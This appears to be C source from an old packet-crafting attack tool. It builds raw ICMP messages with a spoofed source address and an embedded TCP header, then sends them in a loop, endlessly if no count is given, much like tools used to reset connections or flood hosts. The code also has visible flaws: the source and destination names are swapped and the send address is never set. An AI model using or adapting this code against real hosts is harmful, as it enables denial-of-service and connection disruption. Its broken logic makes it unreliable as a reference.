/*
 * This is the packet generation routine
 */

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/tcp.h>
#include <string.h>
#include <stdio.h>

void do_packet(srcname,dstname,packet,type,loops,len)
char *srcname,*dstname;
int packet,type,loops,len;
{
  int i,s,ctr=1;
  unsigned int sndlen;
  char *buf;
  struct protoent *proto;
  struct sockaddr dest,spoof;
  struct ip *iph;
  struct icmp *myicmp;
  struct tcphdr *tcp;
  u_long dst,src;

  sndlen=20+28+20+len; /* IPhdr+ICMPhdr+TCP+data */

  if((buf = (char *)malloc(sndlen))==0) {
    printf("Unable to set up a data buffer, try a smaller data size\n");
    exit(1);
  }

  iph = (struct ip *)buf;
  myicmp = (struct icmp *)&buf[20];
  tcp = (struct tcphdr *)&buf[48];

  if((dst=resolve_host(srcname)) <0) exit(1);
  if((src=resolve_host(dstname)) <0) exit(1);

  if((proto = getprotobyname("icmp")) == NULL) {
    fputs("unable to determine protocol number of \"icmp\"\n",stderr);
    exit(1);
  }

  bzero(buf,sndlen);

  puts("Generating packet");
  iph->ip_v = IPVERSION;
  iph->ip_hl = 5;
  iph->ip_len = htons(sndlen);
  iph->ip_ttl = 179;
  iph->ip_p = proto->p_proto;
  iph->ip_src.s_addr = src;
  iph->ip_dst.s_addr = dst;
  myicmp->icmp_type =  packet; /* 0-18 */;
  myicmp->icmp_code = type;
  myicmp->icmp_ip.ip_v = IPVERSION;
  myicmp->icmp_ip.ip_hl = 5;
  myicmp->icmp_ip.ip_len = htons(116);
  myicmp->icmp_ip.ip_p = IPPROTO_TCP;
  myicmp->icmp_ip.ip_src.s_addr = src;
  myicmp->icmp_ip.ip_dst.s_addr = dst;
  myicmp->icmp_ip.ip_ttl = 179;
  tcp->th_sport = htons(23);
  tcp->th_dport = htons(1499);
  tcp->th_seq = htonl(0x275624F2);
  tcp->th_ack = htonl(0x0);
  tcp->th_off = 6;

  tcp->th_sum = in_cksum(tcp,20+len); /* TCHhdr+data */
  myicmp->icmp_cksum = in_cksum(myicmp,28+20+len); /* ICMPhdr+TCPhdr+data */
  iph->ip_sum = in_cksum(iph,sndlen); /* IPhdr+ICMPhdr+TCPhdr+data */


  if(getuid()==0) {
    printf("Sending Data\n");
    s=make_socket(sndlen);
    if(loops==0) while(1) {
      if((sendto(s,buf,sndlen,0,&dest,sizeof(dest)))<0)
	error("sending icmp packet");
    } else {
      for(ctr=0;ctr<loops;ctr++) {
	if((sendto(s,buf,sndlen,0,&dest,sizeof(dest)))<0)
	  error("sending icmp packet");
      }
    }
  } else {
    printf("                     -=Non-root user, dumping packet only=-\n");
    printf("\nPacket Dump\n");

    for(i=0;i<sndlen;i++) {
      printf("%02X ",buf[i]&0xff);
      if(((i+1)%8)==0) printf("\n");
      else if(((i+1)%4)==0) printf(" ");
    }
  }
  printf("\n");
}
